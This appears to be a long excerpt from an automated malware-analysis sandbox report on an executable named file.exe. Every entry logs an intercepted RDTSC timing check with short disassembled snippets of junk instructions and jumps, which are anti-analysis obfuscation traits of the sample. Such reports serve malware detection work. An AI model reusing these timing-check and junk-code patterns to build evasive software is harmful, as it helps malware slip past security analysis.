              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FAAEA second address: 4FAAFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB560CBB7FAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FAAFA second address: 4FAAFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5019D4 second address: 5019EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FB560CBB804h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501CC5 second address: 501CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FB560E14C36h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501CD4 second address: 501CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501CD8 second address: 501D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB560E14C43h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB560E14C41h 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5024C6 second address: 5024F4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB560CBB802h 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB560CBB7FAh 0x00000015 push eax 0x00000016 push edx 0x00000017 jl 00007FB560CBB7F6h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5024F4 second address: 5024FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5024FC second address: 50251A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560CBB809h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5027B8 second address: 5027DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E14C49h 0x00000007 push edx 0x00000008 js 00007FB560E14C36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502DEE second address: 502DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 508DFD second address: 508E0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FB560E14C36h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090D6 second address: 5090E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FB560CBB7F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090E0 second address: 5090EF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB560E14C36h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509396 second address: 50939A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50939A second address: 5093A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FB560E14C3Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509507 second address: 50950B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509635 second address: 509639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509639 second address: 50963D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5097C5 second address: 5097C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5097C9 second address: 5097CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5097CD second address: 5097DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FB560E14C36h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464822 second address: 46482D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516AA2 second address: 516AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516AA8 second address: 516AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514B9C second address: 514BB5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB560E14C3Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514D2A second address: 514D2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5150EC second address: 515109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E14C44h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51525D second address: 515269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB560CBB7F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51551B second address: 515525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51566A second address: 51567B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB560CBB7FDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51567B second address: 515696 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E14C47h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515696 second address: 51569C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515A7A second address: 515A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 527E36 second address: 527E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jns 00007FB560CBB7F6h 0x0000000c popad 0x0000000d pop edx 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 527D1F second address: 527D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 527D26 second address: 527D2B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4613E7 second address: 4613EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4613EE second address: 4613F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5333B9 second address: 5333CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB560E14C3Ah 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5333CC second address: 5333E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB560CBB7FFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5333E6 second address: 5333F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB560E14C3Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5333F9 second address: 5333FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54315D second address: 543163 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543163 second address: 54317D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB560CBB806h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54317D second address: 543188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543188 second address: 543197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543197 second address: 54319D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54319D second address: 5431B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560CBB7FFh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54BB8B second address: 54BB91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54BB91 second address: 54BB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54BB9A second address: 54BB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54BB9E second address: 54BBDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560CBB803h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FB560CBB802h 0x00000013 jp 00007FB560CBB7F6h 0x00000019 push edi 0x0000001a pop edi 0x0000001b popad 0x0000001c popad 0x0000001d push ebx 0x0000001e pushad 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54BBDC second address: 54BBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550566 second address: 550570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FB560CBB7F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550570 second address: 55058D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E14C49h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550877 second address: 550890 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560CBB804h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550890 second address: 5508A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FB560E14C36h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5508A4 second address: 5508AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550D46 second address: 550D5C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB560E14C36h 0x00000008 jng 00007FB560E14C36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55101C second address: 55103F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB560CBB808h 0x00000008 jl 00007FB560CBB7F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55443F second address: 55444C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB560E14C36h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55444C second address: 554454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557AF2 second address: 557AF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564748 second address: 56474D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567716 second address: 56771C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C40C second address: 45C41A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FB560CBB7F8h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C41A second address: 45C420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C420 second address: 45C426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C426 second address: 45C42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C42A second address: 45C434 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C434 second address: 45C43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB560E14C36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C43E second address: 45C459 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB560CBB7FFh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562349 second address: 562356 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562356 second address: 56235C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56235C second address: 562360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562360 second address: 562374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FB560CBB7FCh 0x0000000e jnl 00007FB560CBB7F6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577461 second address: 577479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB560E14C44h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577002 second address: 577007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577007 second address: 57703C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jne 00007FB560E14C36h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FB560E14C40h 0x00000016 jl 00007FB560E14C3Ch 0x0000001c jnp 00007FB560E14C36h 0x00000022 ja 00007FB560E14C42h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57703C second address: 577063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB560CBB7F6h 0x0000000a pushad 0x0000000b jmp 00007FB560CBB808h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577192 second address: 577197 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577197 second address: 57719D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58C44A second address: 58C44E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58C44E second address: 58C456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58C6FA second address: 58C728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E14C49h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB560E14C41h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58C9D1 second address: 58C9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58FC0B second address: 58FC94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E14C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c jc 00007FB560E14C45h 0x00000012 pop esi 0x00000013 nop 0x00000014 xor dx, A026h 0x00000019 push 00000004h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007FB560E14C38h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 clc 0x00000036 mov dword ptr [ebp+122D2B12h], esi 0x0000003c call 00007FB560E14C39h 0x00000041 jmp 00007FB560E14C3Bh 0x00000046 push eax 0x00000047 pushad 0x00000048 pushad 0x00000049 jng 00007FB560E14C36h 0x0000004f push ecx 0x00000050 pop ecx 0x00000051 popad 0x00000052 push esi 0x00000053 pushad 0x00000054 popad 0x00000055 pop esi 0x00000056 popad 0x00000057 mov eax, dword ptr [esp+04h] 0x0000005b pushad 0x0000005c push esi 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58FC94 second address: 58FCE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007FB560CBB806h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 jbe 00007FB560CBB7FEh 0x00000017 push edi 0x00000018 jnp 00007FB560CBB7F6h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 jp 00007FB560CBB802h 0x0000002a jmp 00007FB560CBB7FCh 0x0000002f pushad 0x00000030 je 00007FB560CBB7F6h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591244 second address: 591257 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB560E14C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007FB560E14C36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591257 second address: 59125F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59125F second address: 591264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593013 second address: 59302F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560CBB7FEh 0x00000007 jl 00007FB560CBB7F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59302F second address: 593041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB560E14C3Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C00284 second address: 4C002A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560CBB801h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB560CBB7FDh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C002A9 second address: 4C00331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E14C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov cl, bl 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB560E14C46h 0x00000014 sbb si, BC08h 0x00000019 jmp 00007FB560E14C3Bh 0x0000001e popfd 0x0000001f jmp 00007FB560E14C48h 0x00000024 popad 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 jmp 00007FB560E14C40h 0x0000002c mov ebp, esp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FB560E14C47h 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C00331 second address: 4C0036B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560CBB809h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB560CBB808h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0036B second address: 4C0036F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
